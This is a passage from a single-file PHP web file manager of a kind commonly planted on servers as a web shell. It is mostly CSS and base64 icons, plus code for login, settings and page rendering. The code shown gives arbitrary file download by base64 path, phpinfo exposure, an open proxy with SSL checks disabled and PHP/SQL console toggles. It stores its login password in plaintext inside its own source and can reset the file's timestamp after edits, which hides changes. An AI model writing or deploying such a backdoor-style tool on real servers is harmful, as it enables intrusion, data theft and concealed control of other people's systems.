YURLquf42hz45CBPDtwACrm+RDcxJYAAAAABJRU5ErkJggg=="); background-repeat: no-repeat; }'; } function fm_config_checkbox_row($name,$value) { global $fm_config; return '<tr><td class="row1"><input id="fm_config_'.$value.'" name="fm_config['.$value.']" value="1" '.(empty($fm_config[$value])?'':'checked="true"').' type="checkbox"></td><td class="row2 whole"><label for="fm_config_'.$value.'">'.$name.'</td></tr>'; } function fm_protocol() { if (isset($_SERVER['HTTP_SCHEME'])) return $_SERVER['HTTP_SCHEME'].'://'; if (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') return 'https://'; if (isset($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == 443) return 'https://'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') return 'https://'; return 'http://'; } function fm_site_url() { return fm_protocol().$_SERVER['HTTP_HOST']; } function fm_url($full=false) { $host=$full?fm_site_url():'.'; return $host.'/'.basename(__FILE__); } function fm_home($full=false){ return ' <a href="'.fm_url($full).'" title="'.__('Home').'"><span class="home"> </span></a>'; } function fm_run_input($lng) { global $fm_config; $return = !empty($fm_config['enable_'.$lng.'_console']) ? ' <form method="post" action="'.fm_url().'" style="display:inline"> <input type="submit" name="'.$lng.'run" value="'.strtoupper($lng).' '.__('Console').'"> </form> ' : ''; return $return; } function fm_url_proxy($matches) { $link = str_replace('&','&',$matches[2]); $url = isset($_GET['url'])?$_GET['url']:''; $parse_url = parse_url($url); $host = $parse_url['scheme'].'://'.$parse_url['host'].'/'; if (substr($link,0,2)=='//') { $link = substr_replace($link,fm_protocol(),0,2); } elseif (substr($link,0,1)=='/') { $link = substr_replace($link,$host,0,1); } elseif (substr($link,0,2)=='./') { $link = substr_replace($link,$host,0,2); } elseif (substr($link,0,4)=='http') { //alles machen wunderschon } else { $link = $host.$link; } if ($matches[1]=='href' && !strripos($link, 'css')) { $base = fm_site_url().'/'.basename(__FILE__); $baseq = $base.'?proxy=true&url='; $link = $baseq.urlencode($link); } elseif (strripos($link, 'css')){ //как-то тоже подменять надо } return $matches[1].'="'.$link.'"'; } function fm_tpl_form($lng_tpl) { global ${$lng_tpl.'_templates'}; $tpl_arr = json_decode(${$lng_tpl.'_templates'},true); $str = ''; foreach ($tpl_arr as $ktpl=>$vtpl) { $str .= '<tr><td class="row1"><input name="'.$lng_tpl.'_name[]" value="'.$ktpl.'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_value[]" cols="55" rows="5" class="textarea_input">'.$vtpl.'</textarea> <input name="del_'.rand().'" type="button" onClick="this.parentNode.parentNode.remove();" value="'.__('Delete').'"/></td></tr>'; } return ' <table> <tr><th colspan="2">'.strtoupper($lng_tpl).' '.__('templates').' '.fm_run_input($lng_tpl).'</th></tr> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1">'.__('Name').'</td><td class="row2 whole">'.__('Value').'</td></tr> '.$str.' <tr><td colspan="2" class="row3"><input name="res" type="button" onClick="document.location.href = \''.fm_url().'?fm_settings=true\';" value="'.__('Reset').'"/> <input type="submit" value="'.__('Save').'" ></td></tr> </form> <form method="post" action=""> <input type="hidden" value="'.$lng_tpl.'" name="tpl_edited"> <tr><td class="row1"><input name="'.$lng_tpl.'_new_name" value="" placeholder="'.__('New').' '.__('Name').'"></td><td class="row2 whole"><textarea name="'.$lng_tpl.'_new_value" cols="55" rows="5" class="textarea_input" placeholder="'.__('New').' '.__('Value').'"></textarea></td></tr> <tr><td colspan="2" class="row3"><input type="submit" value="'.__('Add').'" ></td></tr> </form> </table> '; } function find_text_in_files($dir, $mask, $text) { $results = array(); if ($handle = opendir($dir)) { while (false !== ($entry = readdir($handle))) { if ($entry != "." && $entry != "..") { $path = $dir . "/" . $entry; if (is_dir($path)) { $results = array_merge($results, find_text_in_files($path, $mask, $text)); } else { if (fnmatch($mask, $entry)) { $contents = file_get_contents($path); if (strpos($contents, $text) !== false) { $results[] = str_replace('//', '/', $path); } } } } } closedir($handle); } return $results; } /* End Functions */ // authorization if ($auth['authorize']) { if (isset($_POST['login']) && isset($_POST['password'])){ if (($_POST['login']==$auth['login']) && ($_POST['password']==$auth['password'])) { setcookie($auth['cookie_name'], $auth['login'].'|'.md5($auth['password']), time() + (86400 * $auth['days_authorization'])); $_COOKIE[$auth['cookie_name']]=$auth['login'].'|'.md5($auth['password']); } } if (!isset($_COOKIE[$auth['cookie_name']]) OR ($_COOKIE[$auth['cookie_name']]!=$auth['login'].'|'.md5($auth['password']))) { echo ' <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title>'.__(''.__('$PNG-OP$').'').'</title> </head> <body> <form action="" method="post"> '.__('Login').' <input name="login" type="text"> '.__('Password').' <input name="password" type="password"> <input type="submit" value="'.__('Enter').'" class="fm_input"> </form> '.fm_lang_form($language).' </body> </html> '; die(); } if (isset($_POST['quit'])) { unset($_COOKIE[$auth['cookie_name']]); setcookie($auth['cookie_name'], '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_site_url().$_SERVER['REQUEST_URI']); } } // Change config if (isset($_GET['fm_settings'])) { if (isset($_GET['fm_config_delete'])) { unset($_COOKIE['fm_config']); setcookie('fm_config', '', time() - (86400 * $auth['days_authorization'])); header('Location: '.fm_url().'?fm_settings=true'); exit(0); } elseif (isset($_POST['fm_config'])) { $fm_config = $_POST['fm_config']; setcookie('fm_config', serialize($fm_config), time() + (86400 * $auth['days_authorization'])); $_COOKIE['fm_config'] = serialize($fm_config); $msg = __('Settings').' '.__('done'); } elseif (isset($_POST['fm_login'])) { if (empty($_POST['fm_login']['authorize'])) $_POST['fm_login'] = array('authorize' => '0') + $_POST['fm_login']; $fm_login = json_encode($_POST['fm_login']); $fgc = file_get_contents(__FILE__); $search = preg_match('#authorization[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_login,$fgc); if (file_put_contents(__FILE__, $replace)) { $msg .= __('File updated'); if ($_POST['fm_login']['login'] != $auth['login']) $msg .= ' '.__('Login').': '.$_POST['fm_login']['login']; if ($_POST['fm_login']['password'] != $auth['password']) $msg .= ' '.__('Password').': '.$_POST['fm_login']['password']; $auth = $_POST['fm_login']; } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } elseif (isset($_POST['tpl_edited'])) { $lng_tpl = $_POST['tpl_edited']; if (!empty($_POST[$lng_tpl.'_name'])) { $fm_php = json_encode(array_combine($_POST[$lng_tpl.'_name'],$_POST[$lng_tpl.'_value']),JSON_HEX_APOS); } elseif (!empty($_POST[$lng_tpl.'_new_name'])) { $fm_php = json_encode(json_decode(${$lng_tpl.'_templates'},true)+array($_POST[$lng_tpl.'_new_name']=>$_POST[$lng_tpl.'_new_value']),JSON_HEX_APOS); } if (!empty($fm_php)) { $fgc = file_get_contents(__FILE__); $search = preg_match('#'.$lng_tpl.'_templates[\s]?\=[\s]?\'\{\"(.*?)\"\}\';#', $fgc, $matches); if (!empty($matches[1])) { $filemtime = filemtime(__FILE__); $replace = str_replace('{"'.$matches[1].'"}',$fm_php,$fgc); if (file_put_contents(__FILE__, $replace)) { ${$lng_tpl.'_templates'} = $fm_php; $msg .= __('File updated'); } else $msg .= __('Error occurred'); if (!empty($fm_config['fm_restore_time'])) touch(__FILE__,$filemtime); } } else $msg .= __('Error occurred'); } } // Just show image if (isset($_GET['img'])) { $file=base64_decode($_GET['img']); if ($info=getimagesize($file)){ switch ($info[2]){ //1=GIF, 2=JPG, 3=PNG, 4=SWF, 5=PSD, 6=BMP case 1: $ext='gif'; break; case 2: $ext='jpeg'; break; case 3: $ext='png'; break; case 6: $ext='bmp'; break; default: die(); } header("Content-type: image/$ext"); echo file_get_contents($file); die(); } } // Just download file if (isset($_GET['download'])) { $file=base64_decode($_GET['download']); fm_download($file); } // Just show info if (isset($_GET['phpinfo'])) { phpinfo(); die(); } // Mini proxy, many bugs! if (isset($_GET['proxy']) && (!empty($fm_config['enable_proxy']))) { $url = isset($_GET['url'])?urldecode($_GET['url']):''; $proxy_form = ' <div style="position:relative;z-index:100500;background: linear-gradient(to bottom, #e4f5fc 0%,#bfe8f9 50%,#9fd8ef 51%,#2ab0ed 100%);"> <form action="" method="GET"> <input type="hidden" name="proxy" value="true"> '.fm_home().' <a href="'.$url.'" target="_blank">Url</a>: <input type="text" name="url" value="'.$url.'" size="55"> <input type="submit" value="'.__('Show').'" class="fm_input"> </form> </div> '; if ($url) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_USERAGENT, 'Den1xxx test proxy'); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST,0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER,0); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_REFERER, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER,true); $result = curl_exec($ch); curl_close($ch); //$result = preg_replace('#(src)=["\'][http://]?([^:]*)["\']#Ui', '\\1="'.$url.'/\\2"', $result); $result = preg_replace_callback('#(href|src)=["\'][http://]?([^:]*)["\']#Ui', 'fm_url_proxy', $result); $result = preg_replace('%(<body.*?>)%i', '$1'.'<style>'.fm_home_style().'</style>'.$proxy_form, $result); echo $result; die(); } } ?> <!doctype html> <html> <head> <meta charset="utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <title><?=__('File manager')?></title> <style> body { background-color: white; font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 8pt; margin: 0px; } a:link, a:active, a:visited { color: #006699; text-decoration: none; } a:hover { color: #DD6900; text-decoration: underline; } a.th:link { color: #FFA34F; text-decoration: none; } a.th:active { color: #FFA34F; text-decoration: none; } a.th:visited { color: #FFA34F; text-decoration: none; } a.th:hover { color: #FFA34F; text-decoration: underline; } table.bg { background-color: #ACBBC6 } th, td { font: normal 8pt Verdana, Arial, Helvetica, sans-serif; padding: 3px; } th { height: 25px; background-color: #006699; color: #FFA34F; font-weight: bold; font-size: 11px; } .row1 { background-color: #EFEFEF; } .row2 { background-color: #DEE3E7; } .row3 { background-color: #D1D7DC; padding: 5px; } tr.row1:hover { background-color: #F3FCFC; } tr.row2:hover { background-color: #F0F6F6; } .whole { width: 100%; } .all tbody td:first-child{width:100%;} textarea { font: 9pt 'Courier New', courier; line-height: 125%; padding: 5px; } .textarea_input { height: 1em; } .textarea_input:focus { height: auto; } input[type=submit]{ background: #FCFCFC none !important; cursor: pointer; } .folder { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAKT2lDQ1BQaG90b3Nob3AgSUNDIHByb2ZpbGUAAHjanVNnVFPpFj333vRCS4iAlEtvUhUIIFJCi4AUkSYqIQkQSoghodkVUcERRUUEG8igiAOOjoCMFVEsDIoK2AfkIaKOg6OIisr74Xuja9a89+bN/rXXPues852zzwfACAyWSDNRNYAMqUIeEeCDx8TG4eQuQIEKJHAAEAizZCFz/SMBAPh+PDwrIsAHvgABeNMLCADATZvAMByH/w/qQplcAYCEAcB0kThLCIAUAEB6jkKmAEBGAYCdmCZTAKAEAGDLY2LjAFAtAGAnf+bTAICd+Jl7AQBblCEVAaCRACATZYhEAGg7AKzPVopFAFgwABRmS8Q5ANgtADBJV2ZIALC3AMDOEAuyAAgMADBRiIUpAAR7AGDIIyN4AISZABRG8lc88SuuEOcqAAB4mbI8uSQ5RYFbCC1xB1dXLh4ozkkXKxQ2YQJhmkAuwnmZGTKBNA/g88wAAKCRFRHgg/P9eM4Ors7ONo62Dl8t6r8G/yJiYuP+5c+rcEAAAOF0ftH+LC+zGoA7BoBt/qIl7gRoXgugdfeLZrIPQLUAoOnaV/Nw+H48PEWhkLnZ2eXk5NhKxEJbYcpXff5nwl/AV/1s+X48/Pf14L7iJIEyXYFHBPjgwsz0TKUcz5IJhGLc5o9H/LcL//wd0yLESWK5WCoU41EScY5EmozzMqUiiUKSKcUl0v9k4t8s+wM+3zUAsGo+AXuRLahdYwP2SycQWHTA4vcAAPK7b8HUKAgDgGiD4c93/+8//UegJQCAZkmScQAAXkQkLlTKsz/HCAAARKCBKrBBG/TBGCzABhzBBdzBC/xgNoRCJMTCQhBCCmSAHHJgKayCQiiGzbAdKmAv1EAdNMBRaIaTcA4uwlW4Dj1wD/phCJ7BKLyBCQRByAgTYSHaiAFiilgjjggXmYX4IcFIBBKLJCDJiBRRIkuRNUgxUopUIFVIHfI9cgI5h1xGupE7yAAygvyGvEcxlIGyUT3UDLVDuag3GoRGogvQZHQxmo8WoJvQcrQaPYw2oefQq2gP2o8+Q8cwwOgYBzPEbDAuxsNCsTgsCZNjy7EirAyrxhqwVqwDu4n1Y8+xdwQSgUXACTYEd0IgYR5BSFhMWE7YSKggHCQ0EdoJNwkDhFHCJyKTqEu0JroR+cQYYjIxh1hILCPWEo8TLxB7iEPENyQSiUMyJ7mQAkmxpFTSEtJG0m5SI+ksqZs0SBojk8naZGuyBzmULCAryIXkneTD5DPkG+Qh8lsKnWJAcaT4U+IoUspqShnlEOU05QZlmDJBVaOaUt2ooVQRNY9aQq2htlKvUYeoEzR1mjnNgxZJS6WtopXTGmgXaPdpr+h0uhHdlR5Ol9BX0svpR+iX6AP0dwwNhhWDx4hnKBmbGAcYZxl3GK+YTKYZ04sZx1QwNzHrmOeZD5lvVVgqtip8FZHKCpVKlSaVGyovVKmqpqreqgtV81XLVI+pXlN9rkZVM1PjqQnUlqtVqp1Q61MbU2epO6iHqmeob1Q/pH5Z/YkGWcNMw09DpFGgsV/jvMYgC2MZs3gsIWsNq4Z1gTXEJrHN2Xx2KruY/R27iz2qqaE5QzNKM1ezUvOUZj8H45hx+Jx0TgnnKKeX836K3hTvKeIpG6Y0TLkxZVxrqpaXllirSKtRq0frvTau7aedpr1Fu1n7gQ5Bx0onXCdHZ4/OBZ3nU9lT3acKpxZNPTr1ri6qa6UbobtEd79up+6Ynr5egJ5Mb6feeb3n+hx9L/1U/W36p/VHDFgGswwkBtsMzhg8xTVxbzwdL8fb8VFDXcNAQ6VhlWGX4YSRudE8o9VGjUYPjGnGXOMk423GbcajJgYmISZLTepN7ppSTbmmKaY7TDtMx83MzaLN1pk1mz0x1zLnm+eb15vft2BaeFostqi2uGVJsuRaplnutrxuhVo5WaVYVVpds0atna0l1rutu6cRp7lOk06rntZnw7Dxtsm2qbcZsOXYBtuutm22fWFnYhdnt8Wuw+6TvZN9un2N/T0HDYfZDqsdWh1+c7RyFDpWOt6azpzuP33F9JbpL2dYzxDP2DPjthPLKcRpnVOb00dnF2e5c4PziIuJS4LLLpc+Lpsbxt3IveRKdPVxXeF60vWdm7Obwu2o26/uNu5p7ofcn8w0nymeWTNz0MPIQ+BR5dE/C5+VMGvfrH5PQ0+BZ7XnIy9jL5FXrdewt6V3qvdh7xc+9j5yn+M+4zw33jLeWV/MN8C3yLfLT8Nvnl+F30N/I/9k/3r/0QCngCUBZwOJgUGBWwL7+Hp8Ib+OPzrbZfay2e1BjKC5QRVBj4KtguXBrSFoyOyQrSH355jOkc5pDoVQfujW0Adh5mGLw34MJ4WHhVeGP45wiFga0TGXNXfR3ENz30T6RJZE3ptnMU85ry1KNSo+qi5qPNo3ujS6P8YuZlnM1VidWElsSxw5LiquNm5svt/87fOH4p3iC+N7F5gvyF1weaHOwvSFpxapLhIsOpZATIhOOJTwQRAqqBaMJfITdyWOCnnCHcJnIi/RNtGI2ENcKh5O8kgqTXqS7JG8NXkkxTOlLOW5hCepkLxMDUzdmzqeFpp2IG0yPTq9MYOSkZBxQqohTZO2Z+pn5mZ2y6xlhbL+xW6Lty8elQfJa7OQrAVZLQq2QqboVFoo1yoHsmdlV2a/zYnKOZarnivN7cyzytuQN5zvn//tEsIS4ZK2pYZLVy0dWOa9rGo5sjxxedsK4xUFK4ZWBqw8uIq2Km3VT6vtV5eufr0mek1rgV7ByoLBtQFr6wtVCuWFfevc1+1dT1gvWd+1YfqGnRs+FYmKrhTbF5cVf9go3HjlG4dvyr+Z3JS0qavEuWTPZtJm6ebeLZ5bDpaql+aXDm4N2dq0Dd9WtO319kXbL5fNKNu7g7ZDuaO/PLi8ZafJzs07P1SkVPRU+lQ27tLdtWHX+G7R7ht7vPY07NXbW7z3/T7JvttVAVVN1WbVZftJ+7P3P66Jqun4lvttXa1ObXHtxwPSA/0HIw6217nU1R3SPVRSj9Yr60cOxx++/p3vdy0NNg1VjZzG4iNwRHnk6fcJ3/ceDTradox7rOEH0x92HWcdL2pCmvKaRptTmvtbYlu6T8w+0dbq3nr8R9sfD5w0PFl5SvNUyWna6YLTk2fyz4ydlZ19fi753GDborZ752PO32oPb++6EHTh0kX/i+c7vDvOXPK4dPKy2+UTV7hXmq86X23qdOo8/pPTT8e7nLuarrlca7nuer21e2b36RueN87d9L158Rb/1tWeOT3dvfN6b/fF9/XfFt1+cif9zsu72Xcn7q28T7xf9EDtQdlD3YfVP1v+3Njv3H9qwHeg89HcR/cGhYPP/pH1jw9DBY+Zj8uGDYbrnjg+OTniP3L96fynQ89kzyaeF/6i/suuFxYvfvjV69fO0ZjRoZfyl5O/bXyl/erA6xmv28bCxh6+yXgzMV70VvvtwXfcdx3vo98PT+R8IH8o/2j5sfVT0Kf7kxmTk/8EA5jz/GMzLdsAAAAGYktHRAD/AP8A/6C9p5MAAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfcCAwGMhleGAKOAAAByElEQVQ4y8WTT2sUQRDFf9XTM+PGIBHdEEQR8eAfggaPHvTuyU+i+A38AF48efJbKB5zE0IMAVcCiRhQE8gmm111s9mZ3Zl+Hmay5qAY8GBDdTWPeo9HVRf872O9xVv3/JnrCygIU406K/qbrbP3Vxb/qjD8+OSNtC+VX6RiUyrWpXJD2aenfyR3Xs9N3h5rFIw6EAYQxsAIKMFx+cfSg0dmFk+qJaQyGu0tvwT2KwEZhANQWZGVg3LS83eupM2F5yiDkE9wDPZ762vQfVUJhIKQ7TDaW8TiacCO2lNnd6xjlYvpm49f5FuNZ+XBxpon5BTfWqSzN4AELAFLq+wSbILFdXgguoibUj7+vu0RKG9jeYHk6uIEXIosQZZiNWYuQSQQTWFuYEV3acXTfwdxitKrQAwumYiYO3JzCkVTyDWwsg+DVZR9YNTL3nqNDnHxNBq2f1mc2I1AgnAIRRfGbVQOamenyQ7ay74sI3z+FWWH9aiOrlCFBOaqqLoIyijw+YWHW9u+CKbGsIc0/s2X0bFpHMNUEuKZVQC/2x0mM00P8idfAAetz2ETwG5fa87PnosuhYBOyo8cttMJW+83dlv/tIl3F+b4CYyp2Txw2VUwAAAAAElFTkSuQmCC"); } .file { background-image: url("data:image/png;base64,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"); } <?=fm_home_style()?> .img { background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAABGdBTUEAAK/INwWK6QAAAdFQTFRF7e3t/f39pJ+f+cJajV8q6enpkGIm/sFO/+2O393c5ubm/sxbd29yimdneFg65OTk2zoY6uHi1zAS1crJsHs2nygo3Nrb2LBXrYtm2p5A/+hXpoRqpKOkwri46+vr0MG36Ysz6ujpmI6AnzUywL+/mXVSmIBN8bwwj1VByLGza1ZJ0NDQjYSB/9NjwZ6CwUAsxk0brZyWw7pmGZ4A6LtdkHdf/+N8yow27b5W87RNLZL/2biP7wAA//GJl5eX4NfYsaaLgp6h1b+t/+6R68Fe89ycimZd/uQv3r9NupCB99V25a1cVJbbnHhO/8xS+MBa8fDwi2Ji48qi/+qOdVIzs34x//GOXIzYp5SP/sxgqpiIcp+/siQpcmpstayszSANuKKT9PT04uLiwIky8LdE+sVWvqam8e/vL5IZ+rlH8cNg08Ccz7ad8vLy9LtU1qyUuZ4+r512+8s/wUpL3d3dx7W1fGNa/89Z2cfH+s5n6Ojob1Yts7Kz19fXwIg4p1dN+Pj4zLR0+8pd7strhKAs/9hj/9BV1KtftLS1np2dYlJSZFVV5LRWhEFB5rhZ/9Jq0HtT//CSkIqJ6K5D+LNNblVVvjM047ZMz7e31xEG////tKgu6wAAAJt0Uk5T/////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////wCVVpKYAAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAANZJREFUKFNjmKWiPQsZMMximsqPKpAb2MsAZNjLOwkzggVmJYnyps/QE59eKCEtBhaYFRfjZuThH27lY6kqBxYorS/OMC5wiHZkl2QCCVTkN+trtFj4ZSpMmawDFBD0lCoynzZBl1nIJj55ElBA09pdvc9buT1SYKYBWw1QIC0oNYsjrFHJpSkvRYsBKCCbM9HLN9tWrbqnjUUGZG1AhGuIXZRzpQl3aGwD2B2cZZ2zEoL7W+u6qyAunZXIOMvQrFykqwTiFzBQNOXj4QKzoAKzajtYIQwAlvtpl3V5c8MAAAAASUVORK5CYII="); } @media screen and (max-width:720px){ table{display:block;} #fm_table td{display:inline;float:left;} #fm_table tbody td:first-child{width:100%;padding:0;} #fm_table tbody tr:nth-child(2n+1){background-color:#EFEFEF;} #fm_table tbody tr:nth-child(2n){background-color:#DEE3E7;} #fm_table tr{display:block;float:left;clear:left;width:100%;} #header_table .row2, #header_table .row3 {display:inline;float:left;width:100%;padding:0;} #header_table table td {display:inline;float:left;} } </style> </head> <body> <?php 